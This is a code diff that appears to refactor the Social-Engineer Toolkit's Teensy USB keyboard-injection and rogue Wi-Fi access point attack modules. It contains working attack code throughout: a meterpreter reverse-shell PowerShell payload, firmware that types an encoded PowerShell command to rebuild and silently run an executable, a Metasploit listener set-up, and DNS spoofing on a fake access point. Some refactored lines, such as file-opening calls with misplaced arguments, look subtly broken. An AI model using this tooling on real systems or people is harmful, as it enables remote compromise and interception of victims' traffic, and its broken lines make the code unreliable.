# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")

361
src/teensy/binary2teensy.py
View file

File diff suppressed because one or more lines are too long

100
src/teensy/powershell_shellcode.py
View file

@ -1,8 +1,19 @@
#!/usr/bin/python
import pexpect
from src.core.setcore import *
# coding=utf-8
import os
import time
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
@ -13,45 +24,41 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
filewrite = open(setdir + "/metasploit.payload", "w")
filewrite.write(payload)
filewrite.close()
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ")
shellcode = generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
filewrite = open(setdir + "/x86.powershell", "w")
filewrite.write(shellcode)
filewrite.close()
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode)
time.sleep(3)
fileopen = open(setdir + "/x86.powershell", "r")
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
pass
# read in x amount of bytes
data_read = int(50)
# read in x amount of bytes
data_read = int(50)
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
counter = 0
while True:
reading_encoded = fileopen.read(data_read).rstrip()
if not reading_encoded:
break
output_variable += "const char RevShell_{0}[] PROGMEM = '{1}';\n".format(counter, reading_encoded)
counter += 1
rev_counter = 0
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
output_variable += "RevShell_{0}".format(rev_counter)
rev_counter += 1
if rev_counter == counter:
output_variable += "};\n"
if rev_counter != counter:
else:
output_variable += ",\n"
teensy = output_variable
@ -142,36 +149,39 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n"
"set payload {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "metasploit.answers")))
child.interact()
except:
pass

143
src/teensy/sd2teensy.py
View file

@ -1,15 +1,14 @@
#!/usr/bin/python
import binascii
import base64
import sys
import binascii
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
import src.core.setcore as core
# from src.core.setcore import *
# from src.core.dictionaries import *
# from src.core.menu.text import *
##########################################################################
#
@ -23,6 +22,13 @@ from src.core.menu.text import *
##########################################################################
##########################################################################
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# print main stuff for the application
print("""
********************************************************************
@ -48,43 +54,45 @@ print("""
enabled.\n""")
# grab the path and filename from user
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
fileopen = open(path, "rb")
data = fileopen.read()
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = open("converts.txt", "w")
filewrite.write(data)
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8, 15) + ".txt"
random_filename = core.generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
powershell_command = ("$s=gc \"$HOME\\AppData\\Local\\Temp\\{random_filename}\";"
"$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');"
"$b=new-object byte[] $($s.Length/2);"
"0..$($b.Length-1)|%{{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)}};"
"[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\{random_filename}.exe\",$b)".format(random_filename=random_filename))
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
# there is an odd bug with python unicode, traditional unicode inserts a
# null byte after each character typically.. python does not so the encoded
# command becomes corrupt in order to get around this a null byte is pushed
# to each string value to fix this and make the encodedcommand work properly
#
##########################################################################
@ -101,9 +109,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10, 15) + ".vbs"
vbs = core.generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10, 15) + ".bat"
bat = core.generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -118,9 +126,9 @@ void setup()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd /c echo 0 > %%TEMP%%\\\\%s");
CommandAtRunBar("cmd /c echo 0 > %TEMP%\\\\{random_filename}");
delay(750);
CommandAtRunBar("notepad %%TEMP%%\\\\%s");
CommandAtRunBar("notepad %TEMP%\\\\{random_filename}");
delay(1000);
// Delete the 0
PRES(KEY_DELETE);
@ -132,11 +140,11 @@ void setup()
pinMode(10, OUTPUT);
// see if the card is present and can be initialized:
if (!SD.begin(chipSelect)) {
if (!SD.begin(chipSelect)) {{
Keyboard.println("Card failed, or not present");
// don't do anything more:
return;
}
}}
// open the file. note that only one file can be open at a time,
// so you have to close this one before opening another.
@ -147,15 +155,15 @@ void setup()
File dataFile = SD.open("converts.txt");
if (dataFile) {
fileSize = dataFile.size();
for (filePos = 0; filePos <= fileSize; filePos++) {
for (filePos = 0; filePos <= fileSize; filePos++) {{
Keyboard.print(dataFile.read(),BYTE);
delay(10);
}
}}
dataFile.close();
}
else {
}}
else {{
Keyboard.println("error opening converts.txt");
}
}}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -166,45 +174,45 @@ void setup()
// run through cmd
CommandAtRunBar("cmd");
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
Keyboard.println("powershell -EncodedCommand {powershell_command}");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
Keyboard.println("echo %%TEMP%%\\\\%s.exe > %%TEMP%%\\\\%s");
Keyboard.println("wscript %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %TEMP%\\\\{vbs}");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%TEMP%\\\\{bat}\\" ^& Chr(34), 0 >> %TEMP%\\\\{vbs}");
Keyboard.println("echo Set WshShell = Nothing >> %TEMP%\\\\{vbs}");
Keyboard.println("echo %TEMP%\\\\{random_filename}.exe > %TEMP%\\\\{bat}");
Keyboard.println("wscript %TEMP%\\\\{vbs}");
delay(1000);
Keyboard.println("exit");
}
void loop () {}
}}
void loop () {{}}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){{
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
}}
}}
void AltF4(){{
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
}}
void CtrlS(){{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
}}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
void CommandAtRunBar(char *SomeCommand){{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
@ -217,24 +225,21 @@ void CommandAtRunBar(char *SomeCommand){
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
}}
void PRES(int KeyCode){{
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
}}
""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
with open("teensy.pde", "w") as filewrite:
# write the teensy.pde file out
filewrite.write(output_variable)
print("""
Instructions:
@ -246,4 +251,4 @@ on.
Happy hacking.
""")
return_continue()
core.return_continue()

148
src/teensy/teensy.py
View file

@ -1,34 +1,44 @@
#!/usr/bin/env python
# coding=utf-8
############################
#
# Teensy HID Attack Vector
#
############################
import sys
import re
import os
import subprocess
import datetime
from src.core.setcore import *
import os
import re
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# pull metasploit path
msf_path = meta_path()
msf_path = core.meta_path()
# check operating system
operating_system = check_os()
operating_system = core.check_os()
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
definepath = os.getcwd()
# define if use apache or not
apache = 0
apache = False
# open set_config here
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
with open("/etc/setoolkit/set.config") as fileopen:
apache_check = fileopen.readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
@ -43,49 +53,50 @@ for line in apache_check:
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
apache = True
# grab info from config file
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
with open(os.path.join(core.setdir, "teensy")) as fileopen:
counter = 0
payload_counter = 0
choice = None
for line in fileopen:
line = line.rstrip()
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if not os.path.isfile(setdir + "/teensy"):
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
with open(os.path.join("src/teensy", filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
@ -116,32 +127,47 @@ if choice == "13":
payload_counter = 0
# save our stuff here
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir,
"reports",
"teensy_{0}.pde".format(now))) +
core.bcolors.ENDC)
print(core.bcolors.GREEN +
'[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' +
core.bcolors.ENDC)
print(core.bcolors.RED +
"\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" +
core.bcolors.ENDC)
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
webclone_path = os.path.join(core.setdir, "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
if not apache:
subprocess.Popen("mkdir {0};"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path,
metasploit_exec_path,
os.path.join(webclone_path, "x.exe")),
shell=True).wait()
if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try:
if operating_system != "windows":
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
if not apache:
child.close()
child1.close()

34
src/wireless/stop_wifiattack.py
View file

@ -1,39 +1,43 @@
#!/usr/bin/env python
# coding=utf-8
import subprocess
from src.core.setcore import *
import src.core.setcore as core
#
# Simple python script to kill things created by the SET wifi attack vector
#
interface = input(
setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
print_status(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (
interface), shell=True).wait()
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
"rfkill block all;"
"rfkill unblock all;"
"modprobe rtl8187;"
"rfkill unblock all;"
"ifconfig {0} up".format(interface),
shell=True).wait()
print_status("Killing airbase-ng...")
core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
print_status("Killing dhcpd3 and dhclient3...")
core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
print_status("Killing dnsspoof...")
core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
print_status("Turning off IP_forwarding...")
core.print_status("Turning off IP_forwarding...")
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()
print_status("Killing monitor mode on mon0...")
core.print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()
print_status("Turning off monitor mode on wlan0...")
core.print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()
print_status("SET has stopped the wireless access point. ")
return_continue()
core.print_status("SET has stopped the wireless access point. ")
core.return_continue()

118
src/wireless/wifiattack.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
##############################################
#
# This is a basic setup for an access point
@ -9,10 +10,9 @@
import sys
import os
import subprocess
import re
import pexpect
import time
from src.core.setcore import *
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
@ -20,34 +20,30 @@ from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(definepath)
sys.path.append(core.definepath)
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
print_warning("isc-dhcp-server does not appear to be installed.")
print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
print_info("using SET's local airbase-ng binary")
core.print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
return_continue()
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
@ -79,54 +75,50 @@ subnet 192.168.10.0 netmask 255.255.255.0 {
}
""")
show_fakeap_dhcp_menu = create_menu(
text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(setprompt(["8"], ""))
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "":
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config1)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config2)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2)
dhcptun = 2
if fakeap_dhcp_menu_choice == "exit":
exit_set()
core.exit_set()
interface = input(
setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
interface = input(core.setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")
core.print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "/usr/local/sbin/airmon-ng"
if not os.path.isfile("/usr/local/sbin/airmon-ng"):
else:
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" %
(airmonng_path, interface), shell=True, stdout=subprocess.PIPE)
monproc = subprocess.Popen("{0} start {1} |"
"grep \"monitor mode enabled on\" |"
"cut -d\" \" -f5 |"
"sed -e \'s/)$//\'".format(airmonng_path, interface),
shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
@ -134,47 +126,39 @@ monproc.wait()
subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' %
(airbase_path, access_point, ap_channel, moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
core.print_status("Spawning airbase-ng in a separate child thread...")
child = pexpect.spawn('{0} -P -C 20 -e "{1}" -c {2} {3}'.format(airbase_path, access_point, ap_channel, moniface))
core.print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun == 1:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun == 2:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
core.print_status("Starting the DHCP server on a separate child thread...")
child2 = pexpect.spawn("service isc-dhcp-server start")
# starts ip_forwarding
print_status("Starting IP Forwarding...")
core.print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
core.print_status("Starting DNSSpoof in a separate child thread...")
child4 = pexpect.spawn("{0} -i at0".format(dnsspoof_path))
print_status(
"SET has finished creating the attack. If you experienced issues please report them.")
print_status(
"Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status(
"Be sure to come back to this menu to stop the services once your finished.")
return_continue()
core.print_status("SET has finished creating the attack. If you experienced issues please report them.")
core.print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
core.print_status("Be sure to come back to this menu to stop the services once your finished.")
core.return_continue()